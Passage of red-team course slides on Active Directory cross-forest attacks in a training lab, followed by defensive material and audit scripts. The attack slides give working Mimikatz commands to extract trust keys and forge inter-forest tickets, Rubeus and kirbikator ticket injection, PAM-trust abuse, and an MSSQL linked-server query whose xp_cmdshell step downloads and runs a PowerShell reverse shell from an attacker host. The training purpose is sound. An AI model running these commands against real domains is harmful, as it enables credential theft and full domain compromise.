• TGT Delegation is disabled by default and must be explicitly enabled
across a trust for the trusted (target) forest.
• In the lab, TGTDelegation is set from usvendor.local to techcorp.local
(but not set for the other direction).


On July 9 2019, Microsoft updated the TGT Delegation behavior across forest trusts (even the existing ones for Server 2012 onwards) by addressing this issue as CVE-2019-0683:
https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/changes-to-ticket-granting-ticket-tgt-delegation-across-trusts/ba-p/440283
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0683


Cross Forest Attacks - Unconstrained Delegation


• To enumerate if TGTDelegation is enabled across a forest trust, run the below
command from a DC:
netdom trust trustingforest /domain:trustedforest /EnableTgtDelegation

• In the lab, this is to be run on usvendor-dc:
netdom trust usvendor.local /domain:techcorp.local /EnableTgtDelegation
• The PowerShell cmdlets of the ADModule seem to have a bug: the below
command shows TGTDelegation set to False:
Get-ADTrust -server usvendor.local -Filter *
• But when run from usvendor-dc, it shows TGTDelegation to be True.


Cross Forest Attacks - Trust Key


• By abusing the trust flow between forests in a two-way trust, it is
possible to access resources across the forest boundary.
• We can use the trust key the same way as in domain trusts, but we can
access only those resources which are explicitly shared with our current
forest.
• Let's try to access a file share 'eushare' on euvendor-dc of the
euvendor.local forest from eu.local, which is explicitly shared with
Domain Admins of eu.local.
• Note that we are hopping trusts from us.techcorp.local to eu.local to
euvendor.local!


Cross Forest Attacks - Trust Flow Across Forest


Cross Forest Attacks - Trust Abuse Across Forest


Cross Forest Attacks - Trust Key


• Like the intra-forest scenario, we require the trust key for the inter-forest
trust.
Invoke-Mimikatz -Command '"lsadump::trust /patch"'
or
Invoke-Mimikatz -Command '"lsadump::dcsync /user:eu\euvendor$"'
or
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
• We can also use any of the earlier discussed tools to extract trust keys.


https://adsecurity.org/?p=1588


Cross Forest Attacks - Trust Key


• An inter-forest TGT can be forged:
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:eu.local /sid:S-1-5-21-3657428294-2017276338-1274645009 /rc4:799a0ae7e6ce96369aa7f1e9da25175a /service:krbtgt /target:euvendor.local /sids:S-1-5-21-4066061358-3942393892-617142613-519 /ticket:C:\AD\Tools\kekeo_old\sharedwitheu.kirbi"'


Cross Forest Attacks - Trust Key


• Get a TGS for a service (CIFS below) in the target forest by using the forged trust
ticket.
.\asktgs.exe C:\AD\Tools\kekeo_old\sharedwitheu.kirbi CIFS/euvendor-dc.euvendor.local

• Tickets for other services (like HOST and RPCSS for WMI, HOST and HTTP for
PowerShell Remoting and WinRM) can be created as well.

• Use the TGS to access the target resource which must be explicitly shared:
.\kirbikator.exe lsa CIFS.euvendor-dc.euvendor.local.kirbi

ls \\euvendor-dc.euvendor.local\eushare\


Cross Forest Attacks - Trust Key


• We can also use Rubeus:
C:\Users\Public\Rubeus.exe asktgs /ticket:C:\Users\Public\sharedwitheu.kirbi /service:CIFS/euvendor-dc.euvendor.local /dc:euvendor-dc.euvendor.local /ptt


Cross Forest Attacks - Trust Key


• This is fine, but why can't we access all resources just like intra-forest?
• SID Filtering is the answer. It filters high privilege SIDs from the SIDHistory of a TGT crossing the forest
boundary. This means we cannot just go ahead and access resources in the trusting forest as an
Enterprise Admin.
• But there is a catch (one row of the SID filtering pattern table in MS-PAC):
SID pattern:  S-1-5-21-<Domain>-R, R >= 1000
Description:  Identifiers for end user-created identities and domain groups.
Filtering:    Not filtered at domain and external domain trust boundaries. Can be filtered at member, quarantined, and cross-forest boundaries.
See the filtering pattern table here: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pac/55fc19f2-55ba-4251-8a6a-103dd7c66280
• This means, if we have an external trust (or a forest trust with SID history enabled -
/enablesidhistory:yes), we can inject a SIDHistory for RID > 1000 to access resources accessible to
that identity or group in the target trusting forest.


Also highlighted here: https://dirkjanm.io/active-directory-forest-trusts-part-one-how-does-sid-filtering-work/


Cross Forest Attacks - Trust Key


• We had DA access to eu.local. Let's enumerate trusts from a
PSRemoting session on eu-dc:
Get-ADTrust -Filter *
• SIDFilteringForestAware is set to True, which means SIDHistory is enabled
across the forest trust.
• Please remember that still only RID > 1000 SIDs will be allowed across
the trust boundary.
Get-ADGroup -Identity EUAdmins -Server euvendor.local
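An added example (not course material) that turns the SID filtering rule above, and the SIDFilteringForestAware check here, into an audit helper: it reports which sIDHistory entries would survive a given trust configuration. The trust model is simplified to what the text states (external trust, forest trust with or without SID history enabled), and the two euvendor.local SIDs are the ones used in this section.

```python
"""Evaluate which sIDHistory entries survive SID filtering on a given trust.

Added example, not part of the course material. It encodes the rule the text
quotes from the MS-PAC filtering table: domain SIDs S-1-5-21-<Domain>-R with
R >= 1000 are not filtered at external trust boundaries and cross a forest
trust only when SID history is enabled on it (netdom /enablesidhistory:yes,
reported as SIDFilteringForestAware by Get-ADTrust); RIDs below 1000, the
built-in accounts and groups such as Enterprise Admins (519), are stripped.
Well-known non-domain SIDs are treated as filtered here, a simplification.
"""
from dataclasses import dataclass
import re

DOMAIN_SID = re.compile(r"^S-1-5-21-\d+-\d+-\d+-(\d+)$")

# Well-known RIDs, used only to make the audit output readable.
WELL_KNOWN_RIDS = {
    500: "Administrator",
    512: "Domain Admins",
    518: "Schema Admins",
    519: "Enterprise Admins",
}


@dataclass(frozen=True)
class Trust:
    name: str
    kind: str                      # "forest" or "external"
    sid_history_enabled: bool = False   # /enablesidhistory:yes on a forest trust


@dataclass(frozen=True)
class Verdict:
    sid: str
    survives: bool
    reason: str


def rid_of(sid: str):
    """Return the RID of a domain SID, or None for any other SID format."""
    m = DOMAIN_SID.match(sid)
    return int(m.group(1)) if m else None


def evaluate(sid: str, trust: Trust) -> Verdict:
    """Decide whether one sIDHistory entry reaches the trusting side of the trust."""
    rid = rid_of(sid)
    if rid is None:
        return Verdict(sid, False, "not a domain SID; treated as filtered")
    if rid < 1000:
        label = WELL_KNOWN_RIDS.get(rid, "built-in")
        return Verdict(sid, False, f"RID {rid} ({label}) is below 1000: filtered at the trust boundary")
    if trust.kind == "external":
        return Verdict(sid, True, f"RID {rid} >= 1000 is not filtered on an external trust")
    if trust.kind == "forest" and trust.sid_history_enabled:
        return Verdict(sid, True, f"RID {rid} >= 1000 crosses a forest trust with SID history enabled")
    return Verdict(sid, False, "SID history not enabled on this forest trust; sIDHistory entries are quarantined")


def audit(trust: Trust, sids) -> list:
    """A Verdict for every SID, so an admin can see what a trust setting exposes."""
    return [evaluate(s, trust) for s in sids]


# SIDs from the text: Enterprise Admins of euvendor.local and its EUAdmins group (RID 1103).
EUVENDOR_ENTERPRISE_ADMINS = "S-1-5-21-4066061358-3942393892-617142613-519"
EUVENDOR_EUADMINS = "S-1-5-21-4066061358-3942393892-617142613-1103"

if __name__ == "__main__":
    for trust in (Trust("eu.local -> euvendor.local, SID history enabled", "forest", sid_history_enabled=True),
                  Trust("eu.local -> euvendor.local, default forest trust", "forest")):
        print(trust.name)
        for v in audit(trust, [EUVENDOR_ENTERPRISE_ADMINS, EUVENDOR_EUADMINS, "S-1-5-9"]):
            print(f"  {'PASS' if v.survives else 'DROP'} {v.sid}: {v.reason}")
```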


Cross Forest Attacks - Trust Key


• From eu-dc, create a TGT with SIDHistory of the EUAdmins group:
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:eu.local /sid:S-1-5-21-3657428294-2017276338-1274645009 /rc4:799a0ae7e6ce96369aa7f1e9da25175a /service:krbtgt /target:euvendor.local /sids:S-1-5-21-4066061358-3942393892-617142613-1103 /ticket:C:\Users\Public\euvendornet.kirbi"'


Cross Forest Attacks - Trust Key


• Request a TGS:
.\asktgs.exe C:\Users\Public\euvendornet.kirbi HTTP/euvendor-net.euvendor.local
• Inject that into the current session:
.\kirbikator.exe lsa HTTP.euvendor-net.euvendor.local.kirbi
Or
C:\Users\Public\Rubeus.exe asktgs /ticket:C:\Users\Public\euvendornet.kirbi /service:HTTP/euvendor-net.euvendor.local /dc:euvendor-dc.euvendor.local /ptt

• Access the euvendor-net machine using PSRemoting:
Invoke-Command -ScriptBlock{whoami} -ComputerName euvendor-net.euvendor.local -Authentication NegotiateWithImplicitCredential


Trust Abuse - MSSQL Servers - Database Links


• A database link allows a SQL Server to access external data sources like
other SQL Servers and OLE DB data sources.
• In case of database links between SQL servers, that is, linked SQL servers,
it is possible to execute stored procedures.
• Database links work even across forest trusts.


More at: https://msdn.microsoft.com/en-IN/library/ms188279.aspx


Trust Abuse - MSSQL Servers - Database Links


Searching Database Links
• Look for links to remote servers:
Get-SQLServerLink -Instance us-mssql.us.techcorp.local -Verbose
• We can manually enumerate linked servers:
select * from master..sysservers


Trust Abuse - MSSQL Servers - Database Links


• The openquery function can be used to run queries on a linked database:
select * from openquery("192.168.23.25",'select * from master..sysservers')
• Openquery queries can be chained to access links within links (nested links):
select * from openquery("192.168.23.25",'select * from openquery("db-sqlsrv",''select @@version as version'')')


Trust Abuse - MSSQL Servers - Database Links


Executing Commands
• On the target server, either xp_cmdshell should be already enabled; or
• If rpcout is enabled (disabled by default), xp_cmdshell can be enabled
using:
EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT "db-sqlsrv"


Trust Abuse - MSSQL Servers - Database Links


Executing Commands
• From the initial SQL server, OS commands can be executed using nested
link queries:
select * from openquery("192.168.23.25",'select * from openquery("db-sqlsrv",''select @@version as version;exec master..xp_cmdshell "powershell iex (New-Object Net.WebClient).DownloadString(''''http://192.168.100.X/Invoke-PowerShellTcp.ps1'''')"'')')


Trust Abuse - MSSQL Servers - Database Links


Abusing Database Links
• Crawling links to remote servers:
Get-SQLServerLinkCrawl -Instance us-mssql.us.techcorp.local

• Abusing links to remote servers (without -QueryTarget the command
tries to use xp_cmdshell on every link of the chain):
Get-SQLServerLinkCrawl -Instance us-mssql.us.techcorp.local -Query 'exec master..xp_cmdshell ''whoami''' -QueryTarget db-sqlsrv


Hands-on 26
• Get a reverse shell on db-sqlsrv in the db.local forest by abusing database
links from us-mssql.


Cross Forest Attacks - Foreign Security Principals


• A Foreign Security Principal (FSP) represents a security principal from an
external forest trust or a special identity (like Authenticated Users,
Enterprise DCs etc.).
• Only the SID of an FSP is stored in the ForeignSecurityPrincipals container;
it can be resolved using the trust relationship.
• FSPs allow external principals to be added to domain local security
groups, thus allowing such principals to access resources in the forest.
• Often, FSPs are ignored, misconfigured or too complex to
change/clean up in an enterprise, making them ripe for abuse.


Cross Forest Attacks - Foreign Security Principals


• Let's enumerate FSPs for the db.local domain using the reverse shell we
have there.
• PowerView:
Find-ForeignGroup -Verbose
Find-ForeignUser -Verbose

• Using the ActiveDirectory module:
Get-ADObject -Filter {objectClass -eq "foreignSecurityPrincipal"}


Cross Forest Attacks - ACLs

• Access to resources in a forest trust can also be provided without using FSPs, by using ACLs.
• Principals added to ACLs do NOT show up in the ForeignSecurityPrincipals container, as the container is populated only when a principal is added to a domain local security group.

Cross Forest Attacks - ACLs

• Let's enumerate ACLs for the dbvendor.local domain using the reverse shell we have on db.local:
Find-InterestingDomainAcl -Domain dbvendor.local

Cross Forest Attacks - Abusing PAM Trust

• A PAM trust is usually enabled between a Bastion or Red forest and the production/user forest which it manages.
• A PAM trust provides the ability to access the production forest with high privileges without using credentials of the bastion forest. This gives the bastion forest better security, which is much desired.
• To achieve the above, Shadow Principals are created in the bastion domain which are then mapped to the SIDs of DA or EA groups in the production forest.

Cross Forest Attacks - Abusing PAM Trust

• We have DA access to the techcorp.local forest. By enumerating trusts and hunting for access, we can find that we have Administrative access to the bastion.local forest.
• From techcorp-dc:
Get-ADTrust -Filter *
Get-ADObject -Filter {objectClass -eq "foreignSecurityPrincipal"} -Server bastion.local

Cross Forest Attacks - Abusing PAM Trust

• On bastion-dc, enumerate if there is a PAM trust:
$bastiondc = New-PSSession bastion-dc.bastion.local
Invoke-Command -ScriptBlock {Get-ADTrust -Filter {(ForestTransitive -eq $True) -and (SIDFilteringQuarantined -eq $False)}} -Session $bastiondc

• Check which users are members of the Shadow Principals:
Invoke-Command -ScriptBlock {Get-ADObject -SearchBase ("CN=Shadow Principal Configuration,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -Filter * -Properties * | select Name,member,msDS-ShadowPrincipalSid | fl} -Session $bastiondc
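
The trust check and the Shadow Principal listing above are the raw queries; the following is an added example (not the course's code) that turns them into one review for the owner of the bastion forest: it confirms the PAM trust, maps every Shadow Principal SID to the production group it stands for, marks the DA/EA mappings, and lists the bastion accounts that currently hold them. Server names are the lab's from the slides; the function name and parameters are this example's own.

```powershell
# Added example, not from the course: review Shadow Principals behind a PAM trust.
function Get-ShadowPrincipalAudit {
    param(
        [string]$BastionServer    = 'bastion-dc.bastion.local',   # lab name from the slides
        [string]$ProductionServer = 'production.local'            # lab name from the slides
    )

    # A PAM trust is forest-transitive with SID filtering disabled; otherwise the
    # production forest would strip the shadow-principal SIDs from the token.
    $pam = Get-ADTrust -Server $BastionServer `
        -Filter { (ForestTransitive -eq $true) -and (SIDFilteringQuarantined -eq $false) }
    if (-not $pam) { Write-Warning "No PAM trust found on $BastionServer"; return }

    $cfg  = (Get-ADRootDSE -Server $BastionServer).configurationNamingContext
    $base = "CN=Shadow Principal Configuration,CN=Services,$cfg"

    $shadows = Get-ADObject -Server $BastionServer -SearchBase $base `
        -Filter 'objectClass -eq "msDS-ShadowPrincipal"' `
        -Properties member, 'msDS-ShadowPrincipalSid'

    foreach ($sp in $shadows) {
        # The attribute may come back as a SecurityIdentifier or as raw bytes.
        $raw = $sp.'msDS-ShadowPrincipalSid'
        $sid = if ($raw -is [byte[]]) {
            New-Object System.Security.Principal.SecurityIdentifier($raw, 0)
        } else { [System.Security.Principal.SecurityIdentifier]$raw }

        # RID 512 = Domain Admins, 519 = Enterprise Admins in the production forest.
        $rid = [int]$sid.Value.Split('-')[-1]

        try   { $target = (Get-ADGroup -Identity $sid.Value -Server $ProductionServer).Name }
        catch { $target = '<unresolved>' }

        $members = foreach ($dn in $sp.member) {
            $u = Get-ADUser -Identity $dn -Server $BastionServer -Properties LastLogonDate
            '{0} (enabled={1}, lastLogon={2})' -f $u.SamAccountName, $u.Enabled, $u.LastLogonDate
        }

        [PSCustomObject]@{
            ShadowPrincipal = $sp.Name
            MapsToSid       = $sid.Value
            ProductionGroup = $target
            HighPrivilege   = ($rid -in @(512, 519))
            MemberCount     = @($sp.member).Count
            Members         = ($members -join '; ')
        }
    }
}

# Every account listed here is effectively DA/EA in production without holding a
# production credential, so the list should be short and reviewed regularly.
Get-ShadowPrincipalAudit | Where-Object HighPrivilege | Format-List
```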

Cross Forest Attacks - Abusing PAM Trust

• Establish a direct PSRemoting session on bastion-dc and access production.local:
Enter-PSSession 192.168.102.1 -Authentication NegotiateWithImplicitCredential

Detection and Defense

• Protect and Limit Domain Admins
• Isolate administrative workstations
• Secure local administrators
• Time bound and just enough administration
• Isolate administrators in a separate forest and breach containment using Tiers and ESAE

Protect and Limit Domain Admins

• Reduce the number of Domain Admins in your environment.
• Do not allow, or limit, login of DAs to any machine other than the Domain Controllers. If logins to some servers are necessary, do not allow other administrators to log in to those machines.
• (Try to) Never run a service with a DA. The credential theft protections we are going to discuss soon are rendered useless in the case of a service account.
• Set "Account is sensitive and cannot be delegated" for DAs.

Protect and Limit Domain Admins

Protected Users Group
• Protected Users is a group introduced in Server 2012 R2 for "better protection against credential theft" by not caching credentials in insecure ways. A user added to this group has the following major device protections:
– Cannot use CredSSP and WDigest - no more cleartext credential caching.
– NTLM hash is not cached.
– Kerberos does not use DES or RC4 keys. No caching of cleartext credentials or long-term keys.
• If the domain functional level is Server 2012 R2, the following DC protections are available:
– No NTLM authentication.
– No DES or RC4 keys in Kerberos pre-auth.
– No delegation (constrained or unconstrained).
– No renewal of TGT beyond the initial four hour lifetime - hardcoded, unconfigurable "Maximum lifetime for user ticket" and "Maximum lifetime for user ticket renewal".

https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/protected-users-security-group
https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/how-to-configure-protected-accounts#BKMK_AddtoProtectedUsers

Protect and Limit Domain Admins

Protected Users Group
• Needs all domain controllers to be at least Server 2008 or later (because of AES keys).
• Not recommended by MS to add DAs and EAs to this group without testing "the potential impact" of lock out.
• No cached logon, i.e. no offline sign-on.
• Having computer and service accounts in this group is useless as their credentials will always be present on the host machine.
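
The last three slides give the hygiene rules for DAs (few of them, not used as services, "sensitive and cannot be delegated", in Protected Users, and no computer or service accounts in Protected Users). The following is an added audit (not part of the course material) that checks those rules against a domain; the function names and -Domain parameter are this example's own and it assumes the ActiveDirectory module.

```powershell
# Added example, not from the course: check Domain Admins against the slides' rules.
Import-Module ActiveDirectory

function Get-DomainAdminHygiene {
    param([string]$Domain = (Get-ADDomain).DNSRoot)   # hypothetical parameter

    # The DC-side Protected Users controls (no NTLM, no RC4/DES, no delegation,
    # 4h TGT) need domain functional level Windows2012R2 or higher.
    Write-Host "Domain functional level: $((Get-ADDomain -Server $Domain).DomainMode)"

    $protectedDns = @()
    try {
        $protectedDns = Get-ADGroupMember -Identity 'Protected Users' -Server $Domain -Recursive |
            ForEach-Object DistinguishedName
    } catch { Write-Warning 'Protected Users group not found (PDC emulator older than 2012 R2?)' }

    Get-ADGroupMember -Identity 'Domain Admins' -Server $Domain -Recursive |
        Where-Object objectClass -eq 'user' |
        ForEach-Object {
            $u = Get-ADUser -Identity $_.DistinguishedName -Server $Domain `
                -Properties AccountNotDelegated, ServicePrincipalName, PasswordLastSet, Enabled
            $pwdAge = $null
            if ($u.PasswordLastSet) { $pwdAge = [int]((Get-Date) - $u.PasswordLastSet).TotalDays }
            [PSCustomObject]@{
                Account          = $u.SamAccountName
                Enabled          = $u.Enabled
                InProtectedUsers = ($protectedDns -contains $u.DistinguishedName)
                NotDelegated     = $u.AccountNotDelegated          # the "sensitive" flag
                UsedAsService    = (@($u.ServicePrincipalName).Count -gt 0)  # SPN => runs as a service
                PasswordAgeDays  = $pwdAge
            }
        }
}

function Get-ProtectedUsersMisuse {
    # Computer and service accounts gain nothing from Protected Users (their
    # credentials live on the host anyway) and may simply break.
    param([string]$Domain = (Get-ADDomain).DNSRoot)
    $members = Get-ADGroupMember -Identity 'Protected Users' -Server $Domain -Recursive
    $members | Where-Object { $_.objectClass -ne 'user' } |
        Select-Object Name, objectClass, @{ n = 'Issue'; e = { 'not a user account' } }
    $members | Where-Object objectClass -eq 'user' |
        ForEach-Object { Get-ADUser -Identity $_.DistinguishedName -Server $Domain -Properties ServicePrincipalName } |
        Where-Object { $_.ServicePrincipalName } |
        Select-Object @{ n = 'Name'; e = { $_.SamAccountName } },
                      @{ n = 'objectClass'; e = { 'user' } },
                      @{ n = 'Issue'; e = { 'service account (SPN set)' } }
}

# DAs that break at least one of the rules, then Protected Users members that should not be there.
Get-DomainAdminHygiene |
    Where-Object { -not $_.InProtectedUsers -or -not $_.NotDelegated -or $_.UsedAsService } |
    Format-Table -AutoSize
Get-ProtectedUsersMisuse | Format-Table -AutoSize
```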

Isolate administrative workstations

Privileged Administrative Workstations (PAWs)
• A hardened workstation for performing sensitive tasks like administration of domain controllers, cloud infrastructure, sensitive business functions etc.
• Can provide protection from phishing attacks, OS vulnerabilities and credential replay attacks.
• Admin jump servers are to be accessed only from a PAW. Multiple strategies:
– Separate privilege and hardware for administrative and normal tasks.
– Having a VM on a PAW for user tasks.

https://docs.microsoft.com/en-us/previous-versions/mt227395(v=msdn.10)

Time Bound Administration - JIT

• Just In Time (JIT) administration provides the ability to grant time-bound administrative access on a per-request basis.
• Check out Temporary Group Membership! (Requires the Privileged Access Management Feature to be enabled, which can't be turned off later.)
Add-ADGroupMember -Identity 'Domain Admins' -Members newDA -MemberTimeToLive (New-TimeSpan -Minutes 60)

Time Bound Administration - JEA

• JEA (Just Enough Administration) provides role based access control for PowerShell based remote delegated administration.
• With JEA, non-admin users can connect remotely to machines to perform specific administrative tasks.
• For example, we can control the commands a user can run and even restrict the parameters which can be used.
• JEA endpoints have PowerShell transcription and logging enabled.
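
As an added example (not from the course), the following builds a JEA endpoint that shows the three points above in one place: a role that may run only Get-Service and Restart-Service, Restart-Service limited to a single parameter value, and a session configuration with transcription. The module name, the CORP\ServiceOperators group, the endpoint name and the transcript directory are assumptions for the example.

```powershell
# Added example, not from the course: a JEA endpoint that can only restart the Spooler service.
$moduleName = 'JEASpoolerOps'   # assumed name
$modulePath = Join-Path $env:ProgramFiles "WindowsPowerShell\Modules\$moduleName"
New-Item -ItemType Directory -Path "$modulePath\RoleCapabilities" -Force | Out-Null
# JEA discovers .psrc files through the RoleCapabilities folder of an installed module.
New-ModuleManifest -Path "$modulePath\$moduleName.psd1"

# Role capability: the commands the role may run and, per command, the parameter
# values it may pass. Anything not listed is not visible in the session at all.
New-PSRoleCapabilityFile -Path "$modulePath\RoleCapabilities\SpoolerOperator.psrc" `
    -VisibleCmdlets @(
        'Get-Service',
        @{
            Name       = 'Restart-Service'
            Parameters = @{ Name = 'Name'; ValidateSet = 'Spooler' }
        }
    )

# Session configuration: RestrictedRemoteServer exposes only a minimal command
# set, the virtual account means no admin credential is stored on the host for
# the operator, and every session is transcribed.
New-PSSessionConfigurationFile -Path "$modulePath\SpoolerOps.pssc" `
    -SessionType RestrictedRemoteServer `
    -RunAsVirtualAccount `
    -TranscriptDirectory 'C:\JEATranscripts' `
    -RoleDefinitions @{ 'CORP\ServiceOperators' = @{ RoleCapabilities = 'SpoolerOperator' } }

if (-not (Test-PSSessionConfigurationFile -Path "$modulePath\SpoolerOps.pssc")) {
    throw 'Session configuration file is invalid'
}
Register-PSSessionConfiguration -Name 'SpoolerOps' -Path "$modulePath\SpoolerOps.pssc" -Force | Out-Null

# Verify what a given operator will actually be able to run through the endpoint.
Get-PSSessionCapability -ConfigurationName 'SpoolerOps' -Username 'CORP\opuser' |
    Select-Object Name, CommandType

# Operator side, from a workstation:
#   Enter-PSSession -ComputerName srv01 -ConfigurationName SpoolerOps
#   Restart-Service -Name Spooler    # allowed
#   Restart-Service -Name WinRM      # rejected: 'WinRM' is not in the ValidateSet
```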

Detection and Defense - Tier Model

Active Directory Administrative Tier Model
• Composed of three levels, only for administrative accounts:
– Tier 0 - Accounts, groups and computers which have privileges across the enterprise, like domain controllers, domain admins and enterprise admins.
– Tier 1 - Accounts, groups and computers which have access to resources with a significant amount of business value. A common example role is server administrators who maintain these operating systems, with the ability to impact all enterprise services.
– Tier 2 - Administrator accounts which have administrative control of a significant amount of business value that is hosted on user workstations and devices. Examples include Help Desk and computer support administrators, because they can impact the integrity of almost any user data.
• Control Restrictions - What admins control.
• Logon Restrictions - Where admins can log on to.

Tier Model : Control Restrictions

Tier Model : Logon Restrictions

Detection and Defense - ESAE

ESAE (Enhanced Security Admin Environment)
• Dedicated administrative forest for managing critical assets like administrative users, groups and computers.
• Since a forest, rather than a domain, is considered a security boundary, this model provides enhanced security controls.
• The administrative forest is also called the Red Forest.
• Administrative users in a production forest are used as standard non-privileged users in the administrative forest.
• Selective Authentication to the Red Forest enables stricter security controls on logon of users from non-administrative forests.

https://technet.microsoft.com/en-us/windows-server-docs/security/securing-privileged-access/securing-privileged-access-reference-material#ESAE_BM

ESAE

Detection and Defense - Credential Guard

• It "uses virtualization-based security to isolate secrets so that only privileged system software can access them".
• Effective in stopping PTH and Over-PTH attacks by restricting access to NTLM hashes and TGTs. It is not possible to write Kerberos tickets to memory even if we have credentials.
https://docs.microsoft.com/en-us/windows/access-protection/credential-guard/credential-guard

https://www.blackhat.com/docs/us-15/materials/us-15-Moore-Defeating%20Pass-the-Hash-Separation-Of-Powers-wp.pdf

Detection and Defense - Credential Guard

• But credentials for local accounts in the SAM and service account credentials from LSA Secrets are NOT protected.
• Credential Guard cannot be enabled on a domain controller as it breaks authentication there.
• Only available on the Windows 10 Enterprise edition and Server 2016.
• Mimikatz can bypass it, but that is still no reason not to use it.

Detection and Defense - Device Guard (WDAC)

• It is a group of features "designed to harden a system against malware attacks. Its focus is preventing malicious code from running by ensuring only known good code can run."
• Three primary components:
– Configurable Code Integrity (CCI) - Configure only trusted code to run
– Virtual Secure Mode Protected Code Integrity - Enforces CCI with Kernel Mode (KMCI) and User Mode (UMCI)
– Platform and UEFI Secure Boot - Ensures boot binaries and firmware integrity
https://docs.microsoft.com/en-us/windows/device-security/device-guard/introduction-to-device-guard-virtualization-based-security-and-code-integrity-policies

https://docs.microsoft.com/en-us/defender-for-identity/
https://docs.microsoft.com/en-us/defender-for-identity/understanding-security-alerts

https://www.blackhat.com/docs/us-17/thursday/us-17-Mittal-Evading-MicrosoftATA-for-ActiveDirectory-Domination.pdf

Detection and Defense - Golden Ticket

• Some important Event IDs:
– 4624: Account Logon
– 4672: Admin Logon
Get-WinEvent -FilterHashtable @{Logname='Security';ID=4672} -MaxEvents 1 | Format-List -Property *

Detection and Defense - Silver Ticket

• Event IDs:
– 4624: Account Logon
– 4634: Account Logoff
– 4672: Admin Logon
Get-WinEvent -FilterHashtable @{Logname='Security';ID=4672} -MaxEvents 1 | Format-List -Property *

Configuring Additional LSA Protection: https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection

https://technet.microsoft.com/en-us/library/cc755321(v=ws.10).aspx

Detection and Defense - Deception

• Deception is a very effective technique in Active Directory defense.
• By using decoy domain objects, defenders can trick adversaries into following a particular attack path, which increases the chances of detection and increases the adversary's cost in terms of time.
• Traditionally, deception has been limited to leaving honey credentials on some boxes and checking their usage, but we can use it effectively during other phases of an attack.

Detection and Defense - Deception

• What to target? The adversary mindset of going for the "lowest hanging fruit" and an illusion of superiority over defenders.
• We must provide the adversaries what they are looking for. For example, what adversaries look for in a user object:
– A user with high privileges.
– Permissions over other objects.
– Poorly configured ACLs.
– Misconfigured/dangerous user attributes and so on.
• Let's create some user objects which can be used for deceiving adversaries. We can use Deploy-Deception for this: https://github.com/samratashok/Deploy-Deception
• Note that the Windows Settings|Security Settings|Advanced Audit Policy Configuration|DS Access|Audit Directory Service Access Group Policy needs to be configured to enable 4662 logging.

Detection and Defense - User Deception

• Creates a decoy user whose password never expires, and a 4662 is logged whenever the x500uniqueIdentifier (d07da11f-8a3d-42b6-b0aa-76c962be719a) property of the user is read:
Create-DecoyUser -UserFirstName user -UserLastName manager -Password Pass@123 | Deploy-UserDeception -UserFlag PasswordNeverExpires -GUID d07da11f-8a3d-42b6-b0aa-76c962be719a -Verbose

• This property is not read by net.exe, WMI classes (like Win32_UserAccount) and the ActiveDirectory module. But LDAP based tools like PowerView and ADExplorer trigger the logging.

Detection and Defense - User Deception

• Create a decoy user named decda and make it a member of the Domain Admins group. As a protection against potential abuse, deny logon to the user on any machine:
Create-DecoyUser -UserFirstName dec -UserLastName da -Password Pass@123 | Deploy-PrivilegedUserDeception -Technique DomainAdminsMemebership -Protection DenyLogon -Verbose

• If there is any attempt to use the user's credentials (password or hashes), a 4768 is logged.
• Any enumeration which reads the DACL or all properties of the user will result in a 4662 being logged.
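
The two decoys above only pay off if someone looks at the events they produce; the following is an added example (not the course's code) that collects exactly those signals, 4662 reads of the x500uniqueIdentifier GUID on the first decoy or of the decda object, and 4768 TGT requests for decda, and reports who triggered them and from where. It assumes it runs on a DC with the audit policy from the earlier slide enabled; the function name and parameters are this example's own.

```powershell
# Added example, not from the course: surface the events the decoy users generate.
function Get-DecoyActivity {
    param(
        [string]   $DecoyGuid = 'd07da11f-8a3d-42b6-b0aa-76c962be719a',  # from the slides
        [string]   $DecoyDA   = 'decda',                                  # from the slides
        [datetime] $Since     = (Get-Date).AddDays(-1)
    )

    # Flatten the EventData section of a Security event into name -> value.
    function ConvertTo-EventData([System.Diagnostics.Eventing.Reader.EventRecord]$Event) {
        $h = @{}
        foreach ($d in ([xml]$Event.ToXml()).Event.EventData.Data) { $h[$d.Name] = $d.'#text' }
        $h
    }

    # Object GUID and DN of the decoy DA: 4662 names the object by one of the two.
    $daIds = @()
    $da = Get-ADUser -Identity $DecoyDA -ErrorAction SilentlyContinue
    if ($da) { $daIds = @($da.ObjectGUID.ToString(), $da.DistinguishedName) }

    $events = Get-WinEvent -ErrorAction SilentlyContinue `
        -FilterHashtable @{ LogName = 'Security'; Id = 4662, 4768; StartTime = $Since }

    foreach ($e in $events) {
        $d = ConvertTo-EventData $e
        switch ($e.Id) {
            4662 {
                # Properties lists the attribute GUIDs that were read.
                $hitGuid = [bool]($d.Properties -match $DecoyGuid)
                $hitDA   = [bool]($daIds | Where-Object { $d.ObjectName -like "*$_*" })
                if ($hitGuid -or $hitDA) {
                    $signal = 'decoy DA object read (DACL/all properties)'
                    if ($hitGuid) { $signal = 'decoy user x500uniqueIdentifier read' }
                    [PSCustomObject]@{
                        Time   = $e.TimeCreated
                        Id     = 4662
                        Signal = $signal
                        Actor  = "$($d.SubjectDomainName)\$($d.SubjectUserName)"
                        Detail = $d.ObjectName
                    }
                }
            }
            4768 {
                if ($d.TargetUserName -eq $DecoyDA) {
                    # etype 0x17 = RC4. An RC4 TGT request in an AES-capable domain is
                    # typical of tooling that feeds an NTLM hash rather than a password.
                    [PSCustomObject]@{
                        Time   = $e.TimeCreated
                        Id     = 4768
                        Signal = 'decoy DA credentials used (TGT request)'
                        Actor  = $d.TargetUserName
                        Detail = "from $($d.IpAddress) status=$($d.Status) etype=$($d.TicketEncryptionType)"
                    }
                }
            }
        }
    }
}

# Nothing legitimate should ever touch these objects, so every row is worth a look.
Get-DecoyActivity | Sort-Object Time | Format-Table -AutoSize
```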

Thank you
• Please provide feedback.
• Follow me @chiragsavla94
[email protected]
• For our other courses, please visit: https://bootcamps.pentesteracademy.com/
• For other labs: https://www.pentesteracademy.com/redlabs
• For lab access/extension/support, please contact:
[email protected]
